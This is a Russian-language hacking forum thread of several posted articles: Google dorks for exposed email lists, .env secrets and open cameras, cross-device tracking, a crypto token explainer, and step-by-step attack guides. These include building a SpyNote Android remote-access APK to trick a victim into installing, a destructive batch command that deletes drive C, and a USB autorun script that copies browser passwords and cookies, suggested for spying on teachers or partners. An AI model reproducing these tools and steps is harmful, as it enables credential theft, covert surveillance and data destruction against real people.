Например, вы решили купить камеру наблюдения для того чтобы смотреть с телефона, что происходит дома, пока вы на работе. Все, что вам нужно сделать - это загрузить приложение на телефон или планшет, и вы можете получить изображение с камеры видеонаблюдения в реальном времени. Однако, человек, который обладает знаниями, может перехватить запись с камеры с помощью одного лишь гугла. Как это возможно? К сожалению или к счастью, Google не может защитить устройства в интернете, в особенности те, которые работают на серверах HTTP или HTTPS. В результате, в поисковик попадают все те вещи, которые там быть не должны - данные от учетных записей пользователей, списки адресов email, открытые веб-камеры и многое другое.

Если владелец веб-сайта не использует файл robots.txt для блокировки определенных ресурсов, то Google проиндексирует всю информацию, которая находится на нем. Логично предположить, что через какое-то время любой человек в мире получит доступ к этой информации, если будет знать, что искать и как искать.

Предотвращение Google Dork
Но существует множество способов, как избежать попадания в руки Google Dork. Это делается для того, чтобы избежать индексации вашей конфиденциальной информации поисковым системам.
  1. Шифрование. Не забудьте про шифровку вашей личной информации (пользователя, пароли, данные кредитных карт, почту и т.д.). Вы можете предотвратить попадание ваших файлов в Google Dork, зашифровав их.
  2. Проверка Dorks. Постоянно проверяйте уязвимости на сайте, они часто используются для поиска наиболее популярных запросов Google Dorks. Отправляйте регулярные запросы на свой сайт, чтобы узнать, сможете ли вы отыскать какую-либо важную информацию до того, как это сделают хакеры. В базе данных Exploit Db Dorks вы найдете большой список популярных dorks.
  3. Удаление. После того, как вы обнаружили уязвимый контент, вам необходимо отправить запрос на удаление с помощью Google Search Consolet.
  4. Robots.txt. При помощи файла robots.txt блокируйте доступ к конфиденциальному контенту.

Применение конфигурации robots.txt для устранения Google Dorks
Самый лучший способ обезопасить себя от Google dorks – это использовать файл robots.txt. Рассмотрим несколько примеров.

C помощью следующей конфигурации любое сканирование на вашем сайте будет запрещено, что крайне важно при использовании сайта частного доступа.
Цитата:


User-agent: *

Цитата:


Disallow: /

Кроме того, вы можете заблокировать определенные каталоги, в которых будет исключена возможность сканирования. Чтобы защитить область / admin от злоумышленников введите этот код внутри:
Цитата:


User-agent: *

Цитата:


Disallow: /admin/

Также это обезопасит все внутренние подкаталоги.

Для ограничения доступа к определенным файлам введите:
Цитата:


User-agent: *

Цитата:


Disallow: /privatearea/file.htm

Ограничить доступ к динамическим URL, которые содержат символ "?"
Цитата:


User-agent: *

Цитата:


Disallow: /*?

Чтобы ограничить доступ к определенным расширениям файлов, используйте:
Цитата:


User-agent: *

Цитата:


Disallow: /*.php$/

При таком раскладе доступ ко всем файлам .php будет запрещен.

Вывод
Google - один из самых популярных поисковиков в мире, который, как все знают, может найти практически все. Однако, мы выясняли, что Google может быть использован как хакерский инструмент, если вы не будете на шаг впереди злоумышленников. Крайне важно уметь использовать его для поиска уязвимостей на вашем сайте, чтобы это потом не обернулось против вас. Зная и применяя вышеописанные способы, Google Dork может стать полезным и практичным помощником для вас.


BlackMAST 30.05.2022 17:06

https://i.gyazo.com/d07833aff43df637...733ff0fe93.jpg

Вступить в наш чат

В сегодняшней статье мы продолжаем разбирать методы взлома Google, также известные как Google Dorks. Ранее мы узнали, как с помощью дорков получить данные о логинах и паролях, искать FTP-серверы и веб-сайты, а также закрытые ключи SSH.
Цитата:


Читать первую часть

https://i.gyazo.com/8c7f9d8fc80c5aa0...de47bdccc1.jpg

Электронная почта

Списки email часто создаются для того, чтобы организовать людей в одну группу. Эти списки находятся в общем доступе, которые мы сейчас и будем искать.

Найти списки email с помощью Google Dorks довольно легко. В следующем примере мы собираемся получить файлы Excel, которые могут содержать много адресов электронной почты.
Цитата:


filetype:xls inurl:"email.xls"

https://i.gyazo.com/fa2f7d16e58f1181...952b62e6a6.jpg

Однако стоит отметить тот факт, что некоторые люди специально оставляют в дырке вредоносное ПО. Скачав таблицу с адресами электронной почты, можно легко словить вирус.

Вы заметите, что незашифрованные имена пользователей, пароли и IP-адреса напрямую отображаются в результатах поиска. Вам даже не нужно нажимать на ссылки, чтобы получить данные для входа в базу данных.

ENV файлы

Файл .env позволяет настраивать отдельные переменные вашей среды и используется популярными средами веб-разработки.

Эти файлы (*.env) необходимо перемещать в недоступное для общего круга лиц место. Тем не менее, используя следующий дорк, вы поймете, что многие разработчики не позаботились об этом, поэтому файлы .env находятся в Google.
Цитата:


ext:env intext:APP_ENV= | intext:APP_D***G= | intext:APP_KEY=

Открытые камеры

Можете ли вы себе представить, что вашу личную жизнь в онлайн режиме могут смотреть абсолютно незнакомые пользователи в интернете?

Следующие методы взлома Google могут быть использованы для получения веб-страниц камер в реальном времени, которые не ограничили IP.

Вот dork, чтобы получить различные IP-камеры:
Цитата:


inurl:top.htm inurl:currenttime

https://i.gyazo.com/cbf9a7c13fee4966...f51ba141bf.jpg

Чтобы найти трансляции на основе WebcamXP:
Цитата:



И еще один дорк для обычных живых камер:
Цитата:


inurl:"lvappl.htm"

https://i.gyazo.com/4f0c475292580a41...897266d379.jpg

https://i.gyazo.com/32f43c9fcd2f7a4c...c2894c1f97.jpg

В интернете есть множество онлайн-камер, с помощью которых вы можете вживую смотреть любую часть мира. В доступе без IP-ограничений находятся не только обычные камеры, то и даже военные и правительственные. При большом желании вы даже можете получить доступ к этим камерам, используя белый хакинг. Вы не только сможете дистанционно управлять всей панелью администратора, но и перенастроить ее по желанию.

Заключение

Google Dork - это Cвятой Грааль среди всех поисковых запросов Google. Они позволяют любому человеку получить доступ к нужной информации при условии, что вы умеете ее находить. Зная о возможностях дорков, вы можете использовать их во благо, будь-то защита своих данных или же поиск определенной информации.
Цитата:


Читайте здесь, как предотвратить Google Dork.

ВСЯ ИНФОРМАЦИЯ ПРЕДОСТАВЛЕНА В ОЗНАКОМИТЕЛЬНЫХ ЦЕЛЯХ, МЫ НЕ ПРИЗЫВАЕМ К ДЕЙСТВИЮ




BlackMAST 02.06.2022 17:57



https://i.gyazo.com/b4f6aae70d584d92...3b199d66d1.jpg

Вступить в наш чат

Ежедневно каждый человек сталкивается с рекламой в компьютере или телефоне, при чем большая часть увиденного наверняка вызывает интерес. А теперь вспомните, искали ли вы недавно какой-либо продукт из рекламы? Или может быть вы говорили про него с кем-то? Первый вопрос, который сейчас должно быть одолевает вас: "Как это работает?".

Ответ - Cross-device tracking.
Цитата:


Cross-Device Tracking - еще одна малоизвестная технология для отслеживания. Из названия можно сделать вывод о том, что принцип работы заключается в отслеживании пользователей параллельно с нескольких устройств. Этого можно добиться благодаря использованию высокочастотных звуков, которые не могут быть услышаны человеческим ухом. Проще говоря, Cross-Device Tracking может быть сравним со звуковым маячком для слежения.

https://i.gyazo.com/f58b2ca5b462f0f7...256a961e62.jpg


Для чего и кому это нужно

В первую очередь наибольший интерес Cross-Device Tracking представляет для маркетинговых компаний, которые всегда в поиске новых способов внедрения персонализированной рекламы. Ведь прибыль компании напрямую взаимосвязана с удовлетворением интересов потребителя. Хотя сами потребители не в восторге от идеи, что каждый их шаг фиксируется, и блокируют рекламу на своих устройствах, компании придумывают все новые способы для слежки, агрессивнее прежних.

Однако не только маркетологи оценили Cross-Device Tracking: данный метод отслеживания показался очень эффективным для деанона киберпреступников,которые даже используютTor, VPN и proxy.

Принцип работы Cross-Device Tracking

Чтобы понять как себя защитить, вы должны быть знакомы с принципом его работы. Эта технология работает не только с одним вашим устройством, а одновременно со всеми,такимикак компьютеры, телефоны, телевизоры и т.д. Таким образом создается комбинированный профиль для каждого пользователя, деанонимизирующий его.

https://i.gyazo.com/95bfb528e249f762...46d8b8f6d8.jpg

В качестве примера рассмотрим ситуацию:

Вы используете надежное соединение на компьютере VPN + Tor + proxy, занимаетесь своими делами в интернете, как вдруг раздается какой-то звук на сайте. В это время ваш телефон слышит тот же самый сигнал и вот, что происходит дальше. Допустим, разработчик голосового помощника на вашем телефоне или любое приложение, у которого есть доступ к микрофону, сотрудничает со спецслужбами. Информация, полученная с устройства, ваш IP-адрес и координаты будут незамедлительно переданы в систему для дальнейшего анализа. Конечно, на вашем компьютере есть полный анонизирующий пакет, но ваш телефон не был защищен таким же образом. Но это вы зря, надо было учесть все.

Заключение

Как нам всем известно, вычислить человека по одному лишь IP-адресу совсем не легко, чего не скажешь про технологию сross-device tracking. С помощью телефона или любого другого утройства вы можете преподнести все данные о себе на блюдечке - и номер телефона, и контакты, и координаты а также историю разговоров/СМС, и многое другое - этого хватит с лихвой, чтобы установить личность.

Можно ли защитить себя от сross-device tracking? И ответ положительный. О способах остановить слежку мы расскажем в следующей части.


BlackMAST 06.06.2022 13:24



Вступить в наш чат
Цитата:


Раннее мы рассказали про относительно новый метод слежки, объяснили принцип его работы, а также затронули его опасностьдля пользователей Tor, VPN, proxy.

Читать первую часть

Коротко напомним, что cross-device tracking - это технология отслеживания пользователей с помощью нескольких устройств.

Возможно, вас не беспокоит факт того, что за вами следят, и вам вообще по барабану, кто там и что собирает о вас. Но если все-таки вы не согласны быть героем "Шоу Трумана", то самое время помешать этому.

https://i.gyazo.com/aae8b505090f199c...6eebbf17e0.jpg

Как остановить cross-device tracking

Не стоит думать, что вы не в силах противостоять слежению. Вовсе нет. Вы можете предотвратить это с помощью следующих мер.

Отключите микрофон

Первое и самое необходимое, что нужно сделать - это отключить динамики или в настройках, или оборвав провода. Последнее необязательно, если вы, конечно, не Эдвард Сноуден. Для простых смертных больше подойдет первый способ, то есть ограничить доступ к микрофону. Но тут появляется проблема – нет возможности полноценно пользоваться устройством, особенно это касается телефона. Покуда есть приложения, которые блокируют микрофон в целом, то могут возникнуть проблемы с удобством использования. Например, каждый раз при звонке нужно будет включать микрофон.

Но тут уже сами решайте, что для вас важнее - анонимность или удобство.

Используйте VPN

Еще один отличный способ уберечь себя от отслеживания - использовать VPN. Почему? VPN - это инструмент, который скрывает ваш реальный IP-адрес и местоположение. Как правило, все веб-сайты и приложения, которые вы посещаете, определяют ваше местоположение. При использовании VPN оно будет для них недоступно.
Цитата:


Важно: используйте VPN на всех своих девайсах, не только на компьютере.

Скачайте анонимный браузер

Думаете, что режим инкогнито безопасен? Вы глубоко ошибаетесь. Если вы действительно хотите защитить себя от слежки, то разумнее будет использовать анонимный браузер, такой как Brave, Tor, DuckDuckGo. В отличие от Google и Яндекс, эти браузеры не отслеживают вас и не сохраняют ваши личные данные для дальнейшего обмена с третьими лицами.

Измените разрешения приложения

Зачем Google Chrome доступ к вашему микрофону и местоположению? Если у приложений в вашем телефоне есть полный доступ к тому, что не требуется для использования, то самое время отклонить эти разрешения.

Радикальный метод

И напоследок самый эффективный способ избежать слежки, который маловероятно вам понравится - вовсе отказать от смартфона. Купите обыкновенный кнопочный телефон или же специальный, ориентированный на безопасность. Они имеют очень ограниченный функционал и список установленных приложений. Это же касается и планшета.

Заключение

В современном мире конфиденциальность уже не такая, как была несколько лет назад. Крупные компании, правоохранительные органы используют различные инструменты и методы для отслеживания ваших действий в Интернете. Такое вторжение в личное пространство мало кому придется по душе. Но к счастью, пока что еще есть возможность оградить себя от этого.

BlackMAST 13.06.2022 16:14

https://i.gyazo.com/f73665bd28902959...1a2e2cc8fa.jpg

Вступить в наш чат

В прошлой части мы уже затрагивали тему взлома Android пользователей. В этот раз речь пойдет про другой, более продвинутый вариант хакинга, который работает через интернет.

Если вы пропустили предыдущую часть, то советуем начать именно с нее.
Цитата:


Читать "Как хакнуть любой Android смартфон"

https://i.gyazo.com/3eb8f31b99d29a21...b890afd1d8.jpg


Что потребуется?

Требования те же самые, как и для предыдущего способа, за исключением двух моментов.
  • Java;
  • Spynote;
  • Роутер с функцией проброса портов или переадресации портов. Это необходимо именно для взлома через интернет;
  • Динамический IP-адрес.


Итак, начнем.

Перейдите на noip.com и зарегистрируйтесь.

https://i.gyazo.com/e24d560416f98954...d6a0c79b3d.jpg

Далее кликните "Add Host", вводите любое имя и сохраните.

https://i.gyazo.com/68f0839bd848abd3...b562bd6685.jpg

Загрузите DUC (Dynamic DNS Update Client) с официального сайта или нажмите здесь. Установите DUC и войдите в свою учетную запись. Как только вы это сделаете, IP-адрес вашей системы будет автоматически обновлен в DNS. Если этого не произошло, вы можете настроить DNS вручную.

https://i.gyazo.com/bbced98632d6b5b7...44fdef7126.jpg

Нажмите "Add Host" в DUC, как показано на скрине. Если все сделано правильно, то высветятся все три зеленые галочки.

https://i.gyazo.com/904451ae954d39f2...3222595aa4.jpg

Далее нам нужен IP-адрес шлюза для проброса портов из настроек нашего роутера. Поэтому введите "ipconfig" в командной строке, и вы получите IP-адрес шлюза.

https://i.gyazo.com/d01ab222c17bdd58...e45a174a9d.jpg

Откройте любой браузер и вставьте туда IP шлюза. Откроется страница входа в систему. Введите имя пользователя и пароль вашего роутера (по умолчанию для большинства роутеров оба имени - admin).

Теперь перейдите к опции проброса портов. В зависимости от модели роутера, информация на скриншоте может отличаться, но принцип работы будет один и тот же.

https://i.gyazo.com/da2cbbee95f7247d...5f2ef2c466.jpg

Нажмите "Добавить порт" -> "Добавить порт 2222" и сохраните его. Вы можете указать любой номер порта, какой пожелаете.

Cледующим шагом откройте файл spynote.exe, и он запросит у вас номер порта. Введите 2222 в качестве номера порта. И нажмите сохранить. Настройки роутера будут обновлены.

Добавьте все необходимые данные: имя клиента, название приложения, служба и версия. Вам нужно установить такое же имя хоста, как то, которое вы задали в клиенте NOIP в настройках DNS.

Как только вы закончите с этим, кликните на кнопку "Build".

https://i.gyazo.com/bd46ab598a55b847...9bc157cb78.jpg

Теперь apk будет создан в папке spynote C:\Building-6.1\apktool\out.

https://i.gyazo.com/5bd32aed42175620...4d06b59918.jpg

Готово. Остается только подключить творческий подход, чтобы заставить жертву установить apk на свое устройство.

Вся вышеизложенная информация предоставлена в ознакомительных целях. Мы не призываем к действию.

BlackMAST 20.06.2022 15:39

Цитата:


Cооснователь Ethereum Виталик Бутерин недавно рассказал о своём новом проекте – Soulbound Tokens (SBT) или токены, связанные душами.

Cегодня мы разберёмся в этом явлении. Вы узнаете в чем суть этих токенов, для чего они нужны и когда появятся.

https://i.gyazo.com/0d46c19996641367...7825edb257.jpg

Что такое SBT

Аббревиатура SBT расшифровывается как Soulbound Tokens, что в переводе означает «Связанные душой токены». Пошло такое название из игры World of Warcraft, словом «Soulbound» назывался отдельный класс предметов, которые можно было получить за внутриигровые достижения, например, за победу над противником.

В отличие от игры, в реальной жизни Soulbound действуют как показатели ваших достижений, только вместо профиля игрока, они будут привязываться к крипто-кошельку пользователя. SBT точно так же, как ваше резюме, представляют ваши навыки, опыт работы, образование и квалификацию. На основе всего этого, можно получить представление о ваших способностях.

Отличие NFT от SBT

Основное отличие от NFT заключается в том, SBT не подлежат передаче и, следовательно, не могут быть приобретены посредством торговли. Каждый SBT навсегда привязывается к кошельку.

Сферы применения
  • Искусство. SBT значительно облегчат жизнь NFT-художникам, так как никто не сможет присвоить себе авторские права на чужую работу. Также для того, чтобы разрекламировать свой NFT, художнику приходится заводить аккаунт в Twitter, Instagram и на многих других площадках. Однако, если у художника будет свой Soulbound Token, то соцсети и биржи станут попросту не нужны.
  • Маркетинг. Кроме искусства можно представить использование SBT в любых сферах, где требуется проверка подлинности, например, рынок аренды или покупки недвижимости, где многое значит репутация продавца и достоверность данных, которые он предоставляет о своем объекте.
  • Образование. Когда NFT только начали набирать популярность, шли разговоры о том, что учебные заведения через N-количество лет будут выдавать дипломы в виде NFT, но здесь возникла несостыковка: если NFT можно продать другому человеку, то, соответственно, то же самое можно проделать и с дипломом. Но тут в дело вступают Soulbound Tokens – с ними купить образование или другого рода достижения не получится. Прямая проверка подлинности даст возможность избежать ряд проблем, так как использование технологий блокчейна поможет определить авторство, время, дату получения и другую информацию.
https://i.gyazo.com/f7cb459f1ac12925...611c66429d.jpg

Как могут присваиваться SBT
  • Самостоятельно. Вы можете заполнить и подтвердить информацию о себе, содержащую данные об образовании, стаже работы, творчестве.
  • Пользователями. Такие SBT могут быть получены и подтверждены участниками, с которыми вы взаимодействовали — например, за помощь другому пользователю.
  • Организаторами событий. Это будет своего рода сертификат, подтверждающий участие. Например, за участие в конференции, за прохождение обучения и т.д.
Таким образом, у крипто-кошелька пользователя начнет формироваться своя история и репутация. Можно будет наблюдать, где он обучался, в каких мероприятиях участвовал, кому помогал и где работал.

Когда появятся SBT?

По оценке Виталика Бутерина, первые SBT появятся к концу 2022 года. А к 2024 году они уже станут трендом. Выпускать их смогут как обычные пользователи, так и организации, включая DAO.

Заключение

Soulbound tokens презентовали себя как передовую технологию, позволяющую развить цифровое портфолио, сформировать и укрепить репутацию и сделать пользовательские отношения более прозрачными и надёжными. Хотя нам еще предстоит узнать, как именно SBT повлияют на цифровое пространство, но мы уже точно можем сделать вывод о том, что они изменят мир криптовалюты.

BlackMAST 20.06.2022 15:39

Цитата:


Задумывались ли вы когда-нибудь как создаются вирусы на ПК? Вы будете удивлены, узнав, что для этого вам не нужны никакие знания о языках программирования. Все, что вам потребуется - это блокнот и пара, написанных строк, о которых мы расскажем в этой статье. Это очень просто. Давайте начнем!

https://i.gyazo.com/aea5a62e53041d59...155e678aa4.jpg

Что такое .bat

Для начала разберём немного теории, которая нам впоследствии понадобится. Не все знают, что в блокноте можно написать простые вирусы в формате .bat. Что это за файл такой?

.bat — текстовый файл в MS-DOS, OS/2 или Windows, содержащий последовательность команд после запуска которых, программа-интерпретатор начинает их исполнять.

Как создать файл .bat:
  • Открыть блокнот или иной текстовый редактор;
  • Ввести нужные команды;
  • Сохранить файл с расширением .bat (Например: virus.bat)
Итак, приступим к созданию вируса с помощью блокнота.

Опасный вирус

Дисклеймер
Цитата:


Вся информация, приведённая ниже, представлена лишь в ознакомительных целях. Не пытайтесь повторить это, так как это может полностью уничтожить компьютер за считанные секунды.

  • Для начала вам нужно открыть блокнот.
  • Далее скопируйте и вставьте приведенный ниже код на экран блокнота.
Echo offDel C: *.* |y
  • Сохраните этот файл под любым именем, но обязательно в формате .bat.
  • При запуске этого файла, операционная система и диск С будут уничтожены без возможности восстановления.
Этот метод предназначен только для ознакомительных целей. Не пытайтесь сделать это на своем компьютере, так как это полностью отформатирует ваш диск C.

Вирусы-розыгрыши

1. Создаем экран как в «Матрице»


Данный вирус абсолютно безопасен, потому что на самом деле это больше трюк с блокнотом, не имеющий отношения к реестру компьютера. Используя этот способ, вы можете запустить матричный экран со случайной последовательностью цифр.
  • Откройте блокнот и введите в него следующий код:
Echo offcolor 02:startecho %random% %random% %random% %random% %random% %random% %random% %random% %random% %random%goto start
  • Теперь сохраните файл как под названием Matrix.bat;
  • Откройте файл и почувствуйте себя “избранным”.
Данный трюк может быть использован в качестве розыгрыша друзей.

2. Отключаем доступ к Интернету

Это еще один неопасный способ, который вы также можете продемонстрировать друзьям.
  • Откройте блокнот;
  • Скопируйте и вставьте, ниже указанный код:
Echo off Ipconfig / release
  • Сохраните файл под любым именем, но обязательно в формате.bat;
  • Как только файл будет открыт, IP-адрес потеряется;
  • Чтобы вернуть все, как было, введите в cmd команду «Обновить» или «IPconfig», и проблема будет решена.


BlackMAST 23.06.2022 15:32

https://i.gyazo.com/5e19694f1ae3e5dd...c51e764535.jpg

Вступить в наш чат

Цитата:


В этой статье мы расскажем о том, как легко можно украсть учётные записи и пароли браузера с помощью флешки. А так же поговорим, как защитить себя от подобных атак.

https://i.gyazo.com/2c4a4f42c9fe7b25...2b0fefd3ee.png



Cookie-файлы
– зашифрованные текстовые документы, содержащие информацию о пользователе: статистику, персональные настройки, сохранённые логины и пароли, а также многое другое.
Что это может дать?
Вариантов применения очень много, все лишь зависит от вашей изобретательности. Если вы студент или школьник, то с помощью этого способа вы можете украсть данные препода, тем самым первым узнать о предстоящих контрольных и проверочных работах. Вы также можете проверить вторую половинку или наказать недоброжелателя.
Итак, переходим к пошаговой инструкции:

Создаём cookie-стиллер


1.В первую очередь вам, конечно же, потребуется любая флэшка, где мы создадим следующие текстовые файлы:
Цитата:


autorun.inf

и
Цитата:


stealer.bat

Не забудьте изменить расширения этих файлов с txt на inf и bat.

2. В файле autorun.infвводим:
Цитата:


Open="stealer.bat"

А в файле stealer.batпишем:
Цитата:


@echo off


Цитата:


md %~d0\Mozilla


Цитата:


md %~d0\0pera


Цитата:


md %~d0\Google


Цитата:


md %~d0\Yandex


Цитата:


md %~d0\Amigo


Цитата:


CD/D %APPDATA%\Opera\Opera\


Цитата:


cls


Цитата:


copy /y wand.dat %~d0\Opera\


Цитата:


copy /y cookies.dat %~d0\Opera\


Цитата:


cd %AppData%\Mozilla\Firefox\Profiles\*.default


Цитата:


copy /y cookies.sqlite %~d0\Mozilla


Цитата:


copy /y key3.db %~d0\Mozilla


Цитата:


copy /y signons.sqlite %~d0\Mozilla


Цитата:


copy /y %AppData%\Mozilla\Firefox\Profiles\*.default %~d0\Mozilla


Цитата:


cd %localappdata%\Google\Chrome\User Data\Default


Цитата:


cls


Цитата:


copy /y "%localappdata%\Google\Chrome\User Data\Default\Login Data" "%~d0\Google"


Цитата:


cd %localappdata%\Yandex\YandexBrowser\User Data\Default


Цитата:


copy /y "%localappdata%\Yandex\YandexBrowser\User Data\Default\Login Data" "%~d0\Yandex"


Цитата:


cd %localappdata%\Amigo\User Data\Default


Цитата:


copy /y "%localappdata%\Amigo\User Data\Default\Login Data" "%~d0\Amigo"


Цитата:


cls


Цитата:


ATTRIB -R -A -S -H


Цитата:


attrib +h %~d0\Mozilla


Цитата:


attrib +h %~d0\Opera


Цитата:


attrib +h %~d0\Google


Цитата:


attrib +h %~d0\Yandex


Цитата:


attrib +h %~d0\Amigo


Цитата:


attrib +h %~d0\search.bat


Цитата:


attrib +h %~d0\new


Цитата:


attrib +h %~d0\autorun.inf


Цитата:


del: autorun.inf?


Стиллер готов. Сохраняем и закрываем.

Но что же делать после того, как вы украли куки? Все просто.
3.Нажимаем Windows+R и вводим:
Цитата:


%appdata%

4. Свои куки на СВОЁМ компьютере удаляем, либо временно скидываем на флешку. А на их место копируем полученные.

5. Теперь скачиваем программу WebBrowserPassView. Здесь уже ничего не надо нажимать - программа сама загрузит и расшифрует куки из ваших браузеров. Просто открываем ее и видим сайты с учётными записями и паролями к ним.

Как защитить себя от cookie-стиллера

Никогда не храните пароли в браузере! Уж лучше в тетрадке под кроватью. Хранить пароли в браузере очень опасно. Но что же делать?
Если вы не можете положиться на свою память, то у вас есть два варианта для хранения:
  • Бумага. Самый традиционный и безопасный способ, если при этом хранить в недоступном месте.
  • Софт для хранения паролей. Если вы до сих пор записываете пароли в текстовом документе/блокноте на ПК, то знайте, что это ни чем не лучше браузера. Вместо этого используйте специальное программное обеспечение для хранения паролей. Например, софт KeePassX, который распространяется бесплатно на базе лицензии GPL и имеет открытый исходный код.
Вся вышеизложенная информация предоставлена в ознакомительных целях. Мы не призываем к действию.




Время: 03:00